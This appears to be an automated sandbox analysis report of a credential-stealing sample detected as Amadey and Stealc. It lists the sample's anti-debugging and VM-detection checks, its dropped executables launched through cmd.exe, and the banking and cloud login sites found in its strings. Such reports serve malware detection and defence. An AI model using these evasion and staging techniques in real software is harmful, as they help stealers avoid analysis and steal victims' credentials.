Source: C:\Users\user\Desktop\file.exe Code function: 0_2_0040F4F0 FindFirstFileA,StrCmpCA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,FindNextFileA,FindClose, 0_2_0040F4F0
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_0040BCB0 FindFirstFileA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,CopyFileA,StrCmpCA,DeleteFileA,StrCmpCA,FindNextFileA,FindClose, 0_2_0040BCB0
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_004139B0 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,FindNextFileA,FindClose, 0_2_004139B0
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_0040E270 FindFirstFileA,StrCmpCA,StrCmpCA,FindNextFileA, 0_2_0040E270
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_00401710 FindFirstFileA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,FindNextFileA,FindClose, 0_2_00401710
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_004143F0 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,wsprintfA,StrCmpCA,wsprintfA,wsprintfA,PathMatchSpecA,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,CopyFileA,DeleteFileA,FindNextFileA,FindClose, 0_2_004143F0
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_0040DC50 FindFirstFileA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,FindNextFileA,FindClose, 0_2_0040DC50
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_00414050 GetProcessHeap,HeapAlloc,wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,wsprintfA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,lstrcat,lstrcat,lstrlenA,lstrlenA, 0_2_00414050
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_0040EB60 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,lstrlenA,DeleteFileA,CopyFileA,FindNextFileA,FindClose, 0_2_0040EB60
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_004133C0 wsprintfA,FindFirstFileA,lstrcat,StrCmpCA,StrCmpCA,wsprintfA,PathMatchSpecA,CoInitialize,lstrcat,lstrlenA,StrCmpCA,wsprintfA,wsprintfA,PathMatchSpecA,wsprintfA,CopyFileA,__ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z,DeleteFileA,FindNextFileA,FindClose, 0_2_004133C0
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_00401160 GetSystemInfo,ExitProcess, 0_2_00401160
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe Thread delayed: delay time: 30000 Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe Thread delayed: delay time: 180000 Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe Thread delayed: delay time: 30000
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe Thread delayed: delay time: 180000
Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\_locales\bg\ Jump to behavior
Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\css\ Jump to behavior
Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\html\ Jump to behavior
Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\_locales\ Jump to behavior
Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\images\ Jump to behavior
Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\ Jump to behavior
Source: RoamingBKJEGDGIJE.exe, RoamingBKJEGDGIJE.exe, 00000006.00000002.2373687133.000000000049A000.00000040.00000001.01000000.00000009.sdmp, RoamingIJEGDBGDBF.exe, RoamingIJEGDBGDBF.exe, 00000009.00000002.2452147318.0000000000251000.00000040.00000001.01000000.0000000A.sdmp, explorti.exe, explorti.exe, 0000000E.00000002.2491799529.0000000000DF1000.00000040.00000001.01000000.0000000F.sdmp, explorti.exe, 0000000F.00000002.2492757174.0000000000DF1000.00000040.00000001.01000000.0000000F.sdmp, axplong.exe, 00000013.00000002.2766986693.0000000000A1A000.00000040.00000001.01000000.0000000D.sdmp Binary or memory string: HARDWARE\ACPI\DSDT\VBOX__
Source: EBFBKFBG.0.dr Binary or memory string: Interactive Brokers - EU East & CentralVMware20,11696487552
Source: EBFBKFBG.0.dr Binary or memory string: secure.bankofamerica.comVMware20,11696487552|UE
Source: EBFBKFBG.0.dr Binary or memory string: account.microsoft.com/profileVMware20,11696487552u
Source: EBFBKFBG.0.dr Binary or memory string: discord.comVMware20,11696487552f
Source: RoamingIJEGDBGDBF.exe, 00000009.00000003.2411611775.00000000012DE000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: \\?\STORAGE#Volume#{a33c735c-61ca-11ee-8c18-806e6f6e6963}#0000000000100000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{a33c735c-61ca-11ee-8c18-806e6f6e6963}#0000000C5E500000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{a33c735c-61ca-11ee-8c18-806e6f6e6963}#0000000007500000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
Source: Amcache.hve.13.dr Binary or memory string: VMware, Inc.
Source: EBFBKFBG.0.dr Binary or memory string: bankofamerica.comVMware20,11696487552x
Source: Amcache.hve.13.dr Binary or memory string: VMware20,1hbin@
Source: file.exe, 00000000.00000002.2400447542.00000000024DE000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: VMwareVMwared};d
Source: EBFBKFBG.0.dr Binary or memory string: www.interactivebrokers.comVMware20,11696487552}
Source: Amcache.hve.13.dr Binary or memory string: VMware-42 27 80 4d 99 30 0e 9c-c1 9b 2a 23 ea 1f c4 20
Source: file.exe, 00000000.00000002.2400608729.0000000002507000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.2400608729.0000000002571000.00000004.00000020.00020000.00000000.sdmp, explorti.exe, 00000012.00000003.3042588900.000000000126A000.00000004.00000020.00020000.00000000.sdmp, explorti.exe, 00000012.00000003.3042588900.000000000126F000.00000004.00000020.00020000.00000000.sdmp, 7ca32398cd.exe, 00000014.00000002.2836612791.0000000002698000.00000004.00000020.00020000.00000000.sdmp, 7ca32398cd.exe, 00000014.00000002.2836612791.00000000026EE000.00000004.00000020.00020000.00000000.sdmp, 7ca32398cd.exe, 00000025.00000002.3000379607.000000000260C000.00000004.00000020.00020000.00000000.sdmp, 7ca32398cd.exe, 00000025.00000002.3000379607.00000000025BA000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAW
Source: EBFBKFBG.0.dr Binary or memory string: ms.portal.azure.comVMware20,11696487552
Source: EBFBKFBG.0.dr Binary or memory string: Canara Change Transaction PasswordVMware20,11696487552
Source: EBFBKFBG.0.dr Binary or memory string: Interactive Brokers - COM.HKVMware20,11696487552
Source: EBFBKFBG.0.dr Binary or memory string: global block list test formVMware20,11696487552
Source: EBFBKFBG.0.dr Binary or memory string: tasks.office.comVMware20,11696487552o
Source: EBFBKFBG.0.dr Binary or memory string: AMC password management pageVMware20,11696487552
Source: EBFBKFBG.0.dr Binary or memory string: interactivebrokers.co.inVMware20,11696487552d
Source: EBFBKFBG.0.dr Binary or memory string: interactivebrokers.comVMware20,11696487552
Source: EBFBKFBG.0.dr Binary or memory string: dev.azure.comVMware20,11696487552j
Source: file.exe, 00000000.00000002.2433974980.000000002ED60000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}5-
Source: EBFBKFBG.0.dr Binary or memory string: Interactive Brokers - HKVMware20,11696487552]
Source: EBFBKFBG.0.dr Binary or memory string: microsoft.visualstudio.comVMware20,11696487552x
Source: EBFBKFBG.0.dr Binary or memory string: netportal.hdfcbank.comVMware20,11696487552
Source: RoamingIJEGDBGDBF.exe, 00000009.00000003.2419740523.00000000012C4000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: \\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\\?\Volume{a33c736e-61ca-11ee-8c18-806e6f6e6963}\
Source: EBFBKFBG.0.dr Binary or memory string: trackpan.utiitsl.comVMware20,11696487552h
Source: EBFBKFBG.0.dr Binary or memory string: Interactive Brokers - NDCDYNVMware20,11696487552z
Source: EBFBKFBG.0.dr Binary or memory string: www.interactivebrokers.co.inVMware20,11696487552~
Source: EBFBKFBG.0.dr Binary or memory string: outlook.office365.comVMware20,11696487552t
Source: EBFBKFBG.0.dr Binary or memory string: Canara Change Transaction PasswordVMware20,11696487552^
Source: Amcache.hve.13.dr Binary or memory string: Microsoft Hyper-V Generation Counter
Source: 7ca32398cd.exe, 00000025.00000002.3000379607.00000000025BA000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: VMwareVMware
Source: EBFBKFBG.0.dr Binary or memory string: Interactive Brokers - GDCDYNVMware20,11696487552p
Source: EBFBKFBG.0.dr Binary or memory string: Interactive Brokers - EU WestVMware20,11696487552n
Source: Amcache.hve.13.dr Binary or memory string: Microsoft Hyper-V Virtualization Infrastructure Driver
Source: EBFBKFBG.0.dr Binary or memory string: outlook.office.comVMware20,11696487552s
Source: EBFBKFBG.0.dr Binary or memory string: Test URL for global passwords blocklistVMware20,11696487552
Source: Amcache.hve.13.dr Binary or memory string: VMware Virtual RAM
Source: EBFBKFBG.0.dr Binary or memory string: turbotax.intuit.comVMware20,11696487552t
Source: EBFBKFBG.0.dr Binary or memory string: Canara Transaction PasswordVMware20,11696487552x
Source: RoamingBKJEGDGIJE.exe, 00000006.00000002.2373687133.000000000049A000.00000040.00000001.01000000.00000009.sdmp, RoamingIJEGDBGDBF.exe, 00000009.00000002.2452147318.0000000000251000.00000040.00000001.01000000.0000000A.sdmp, explorti.exe, 0000000E.00000002.2491799529.0000000000DF1000.00000040.00000001.01000000.0000000F.sdmp, explorti.exe, 0000000F.00000002.2492757174.0000000000DF1000.00000040.00000001.01000000.0000000F.sdmp, axplong.exe, 00000013.00000002.2766986693.0000000000A1A000.00000040.00000001.01000000.0000000D.sdmp Binary or memory string: Restart now?\\.\Oreans.vxd%s\Oreans.vxdXprotEventHARDWARE\ACPI\DSDT\VBOX__SeShutdownPrivilegeSoftware\WinLicenseCreateEvent API Error while extraction the driverGetEnvironmentVariable API Error while extraction the driverOpenSCManager API Error while extraction the driverCreateService API Error while extraction the driverCloseServiceHandle API Error while extraction the driverOpenService API Error while extraction the driverStartService API Error while extraction the driverAPIC error: Cannot find Processors Control Blocks. Please,
Source: 7ca32398cd.exe, 00000014.00000002.2836612791.00000000026D2000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAW9"
Source: 7ca32398cd.exe, 00000025.00000002.3000379607.00000000025BA000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: VMwareVMwareN
Source: EBFBKFBG.0.dr Binary or memory string: Canara Transaction PasswordVMware20,11696487552}
Source: EBFBKFBG.0.dr Binary or memory string: Interactive Brokers - non-EU EuropeVMware20,11696487552
Source: C:\Users\user\Desktop\file.exe API call chain: ExitProcess graph end node
Source: C:\Users\user\Desktop\file.exe API call chain: ExitProcess graph end node
Source: C:\Users\user\Desktop\file.exe API call chain: ExitProcess graph end node
Source: C:\Users\user\Desktop\file.exe API call chain: ExitProcess graph end node
Source: C:\Users\user\Desktop\file.exe API call chain: ExitProcess graph end node
Source: C:\Users\user\Desktop\file.exe API call chain: ExitProcess graph end node
Source: C:\Users\user\Desktop\file.exe API call chain: ExitProcess graph end node
Source: C:\Users\user\Desktop\file.exe API call chain: ExitProcess graph end node
Source: C:\Users\user\AppData\RoamingBKJEGDGIJE.exe System information queried: ModuleInformation Jump to behavior
Source: C:\Users\user\Desktop\file.exe Process information queried: ProcessInformation Jump to behavior

Anti Debugging
barindex
Hides threads from debuggers
Source: C:\Users\user\AppData\RoamingBKJEGDGIJE.exe Thread information set: HideFromDebugger Jump to behavior
Source: C:\Users\user\AppData\RoamingIJEGDBGDBF.exe Thread information set: HideFromDebugger Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe Thread information set: HideFromDebugger Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe Thread information set: HideFromDebugger
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe Thread information set: HideFromDebugger
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe Thread information set: HideFromDebugger
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe Thread information set: HideFromDebugger
Tries to detect sandboxes and other dynamic analysis tools (window names)
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe Open window title or class name: regmonclass
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe Open window title or class name: gbdyllo
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe Open window title or class name: process monitor - sysinternals: www.sysinternals.com
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe Open window title or class name: procmon_window_class
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe Open window title or class name: registry monitor - sysinternals: www.sysinternals.com
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe Open window title or class name: ollydbg
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe Open window title or class name: filemonclass
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe Open window title or class name: file monitor - sysinternals: www.sysinternals.com
Checks for debuggers (devices)
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe File opened: NTICE
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe File opened: SICE
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe File opened: SIWVID
Checks if the current process is being debugged
Source: C:\Users\user\AppData\RoamingBKJEGDGIJE.exe Process queried: DebugPort Jump to behavior
Source: C:\Users\user\AppData\RoamingBKJEGDGIJE.exe Process queried: DebugPort Jump to behavior
Source: C:\Users\user\AppData\RoamingBKJEGDGIJE.exe Process queried: DebugPort Jump to behavior
Source: C:\Users\user\AppData\RoamingIJEGDBGDBF.exe Process queried: DebugPort Jump to behavior
Source: C:\Users\user\AppData\RoamingIJEGDBGDBF.exe Process queried: DebugPort Jump to behavior
Source: C:\Users\user\AppData\RoamingIJEGDBGDBF.exe Process queried: DebugPort Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe Process queried: DebugPort Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe Process queried: DebugPort Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe Process queried: DebugPort Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe Process queried: DebugPort
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe Process queried: DebugPort
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe Process queried: DebugPort
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe Process queried: DebugPort
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe Process queried: DebugPort
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe Process queried: DebugPort
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe Process queried: DebugPort
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe Process queried: DebugPort
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe Process queried: DebugPort
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe Process queried: DebugPort
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe Process queried: DebugPort
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe Process queried: DebugPort
Contains functionality for execution timing, often used to detect debuggers
Source: C:\Users\user\AppData\RoamingBKJEGDGIJE.exe Code function: 6_2_04A906A8 rdtsc 6_2_04A906A8
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_0041ACFA IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess, 0_2_0041ACFA
Contains functionality to create guard pages, often used to hinder reverse usering and debugging
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_00404610 VirtualProtect ?,00000004,00000100,00000000 0_2_00404610
Contains functionality to dynamically determine API calls
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_004195E0 GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress, 0_2_004195E0
Contains functionality to read the PEB
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_00419160 mov eax, dword ptr fs:[00000030h] 0_2_00419160
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_00405000 GetProcessHeap,RtlAllocateHeap,InternetOpenA,InternetOpenUrlA,InternetReadFile,memcpy,InternetCloseHandle,InternetCloseHandle, 0_2_00405000
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_0041C8D9 SetUnhandledExceptionFilter, 0_2_0041C8D9
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_0041ACFA IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess, 0_2_0041ACFA
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_0041A718 memset,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter, 0_2_0041A718
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_6CB6B66C SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess, 0_2_6CB6B66C
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_6CB6B1F7 IsProcessorFeaturePresent,memset,memset,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter, 0_2_6CB6B1F7
Source: C:\Users\user\Desktop\file.exe Memory protected: page guard Jump to behavior

HIPS / PFW / Operating System Protection Evasion
barindex
Yara detected Powershell download and execute
Source: Yara match File source: Process Memory Space: file.exe PID: 2036, type: MEMORYSTR
Source: Yara match File source: Process Memory Space: 7ca32398cd.exe PID: 8012, type: MEMORYSTR
Source: Yara match File source: Process Memory Space: 7ca32398cd.exe PID: 1336, type: MEMORYSTR
Maps a DLL or memory area into another process
Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe Section loaded: NULL target: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.55\identity_helper.exe protection: readonly
Searches for specific processes (likely to inject)
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_004190A0 CreateToolhelp32Snapshot,Process32First,Process32Next,StrCmpCA,CloseHandle, 0_2_004190A0
Creates a process in suspended mode (likely to inject code)
Source: C:\Users\user\Desktop\file.exe Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\system32\cmd.exe" /c start "" "C:\Users\user\AppData\RoamingBKJEGDGIJE.exe" Jump to behavior
Source: C:\Users\user\Desktop\file.exe Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\system32\cmd.exe" /c start "" "C:\Users\user\AppData\RoamingIJEGDBGDBF.exe" Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Users\user\AppData\RoamingBKJEGDGIJE.exe "C:\Users\user\AppData\RoamingBKJEGDGIJE.exe" Jump to behavior
Source: C:\Users\user\AppData\RoamingBKJEGDGIJE.exe Process created: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe "C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe" Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Users\user\AppData\RoamingIJEGDBGDBF.exe "C:\Users\user\AppData\RoamingIJEGDBGDBF.exe" Jump to behavior
Source: C:\Users\user\AppData\RoamingIJEGDBGDBF.exe Process created: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe "C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe" Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe Process created: C:\Users\user\AppData\Local\Temp\1000002001\7ca32398cd.exe "C:\Users\user\AppData\Local\Temp\1000002001\7ca32398cd.exe"
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe Process created: C:\Users\user\1000003002\5aa32fec17.exe "C:\Users\user\1000003002\5aa32fec17.exe"
Source: C:\Users\user\1000003002\5aa32fec17.exe Process created: C:\Windows\System32\cmd.exe "C:\Windows\sysnative\cmd.exe" /c "C:\Users\user\AppData\Local\Temp\5175.tmp\5176.tmp\5177.bat C:\Users\user\1000003002\5aa32fec17.exe"
Source: C:\Windows\System32\cmd.exe Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" "https://www.youtube.com/account"
Source: C:\Windows\System32\cmd.exe Process created: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" "https://www.youtube.com/account"
Source: C:\Windows\System32\cmd.exe Process created: C:\Program Files\Mozilla Firefox\firefox.exe "C:\Program Files\Mozilla Firefox\firefox.exe" "https://www.youtube.com/account"
Source: RoamingBKJEGDGIJE.exe, RoamingBKJEGDGIJE.exe, 00000006.00000002.2373687133.000000000049A000.00000040.00000001.01000000.00000009.sdmp, RoamingIJEGDBGDBF.exe, RoamingIJEGDBGDBF.exe, 00000009.00000002.2452147318.0000000000251000.00000040.00000001.01000000.0000000A.sdmp Binary or memory string: Program Manager
Contains functionality to query locales information (e.g. system language)
Source: C:\Users\user\Desktop\file.exe Code function: GetKeyboardLayoutList,LocalAlloc,GetKeyboardLayoutList,GetLocaleInfoA,LocalFree, 0_2_00417630
Queries information about the installed CPU (vendor, model number etc)
Source: C:\Users\user\Desktop\file.exe Registry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 Jump to behavior
Source: C:\Users\user\Desktop\file.exe Registry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 Jump to behavior
Queries the volume information (name, serial number etc) of a device
Source: C:\Users\user\Desktop\file.exe Queries volume information: C:\ VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\file.exe Queries volume information: C:\ VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe Queries volume information: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe Queries volume information: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe Queries volume information: C:\Users\user\AppData\Local\Temp\1000002001\7ca32398cd.exe VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe Queries volume information: C:\Users\user\AppData\Local\Temp\1000002001\7ca32398cd.exe VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe Queries volume information: C:\Users\user\1000003002\5aa32fec17.exe VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe Queries volume information: C:\Users\user\1000003002\5aa32fec17.exe VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\1000002001\7ca32398cd.exe Queries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\cmd.exe Queries volume information: C:\ VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\1000002001\7ca32398cd.exe Queries volume information: C:\ VolumeInformation
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_00417420 GetProcessHeap,HeapAlloc,GetLocalTime,wsprintfA, 0_2_00417420
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_004172F0 GetProcessHeap,HeapAlloc,GetUserNameA, 0_2_004172F0
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_004174D0 GetProcessHeap,HeapAlloc,GetTimeZoneInformation,wsprintfA, 0_2_004174D0

Stealing of Sensitive Information
barindex
Yara detected Amadeys stealer DLL
Source: Yara match File source: 6.2.RoamingBKJEGDGIJE.exe.2a0000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 14.2.explorti.exe.c00000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 15.2.explorti.exe.c00000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 19.2.axplong.exe.820000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 9.2.RoamingIJEGDBGDBF.exe.60000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 00000013.00000002.2766827363.0000000000821000.00000040.00000001.01000000.0000000D.sdmp, type: MEMORY
Source: Yara match File source: 00000009.00000003.2365017616.0000000005120000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000006.00000002.2373501686.00000000002A1000.00000040.00000001.01000000.00000009.sdmp, type: MEMORY
Source: Yara match File source: 00000009.00000002.2451973039.0000000000061000.00000040.00000001.01000000.0000000A.sdmp, type: MEMORY
Source: Yara match File source: 0000000B.00000003.2379252513.0000000004F60000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000012.00000003.2737331224.0000000004D90000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000F.00000003.2451358988.0000000004AF0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000013.00000003.2726323030.0000000005130000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000E.00000002.2491687101.0000000000C01000.00000040.00000001.01000000.0000000F.sdmp, type: MEMORY
Source: Yara match File source: 0000000E.00000003.2450117258.0000000004910000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000F.00000002.2492594050.0000000000C01000.00000040.00000001.01000000.0000000F.sdmp, type: MEMORY
Source: Yara match File source: 00000006.00000003.2332541426.0000000004880000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Yara detected Stealc
Source: Yara match File source: 00000000.00000002.2400608729.0000000002507000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000014.00000002.2836612791.0000000002698000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000025.00000002.3000379607.00000000025BA000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
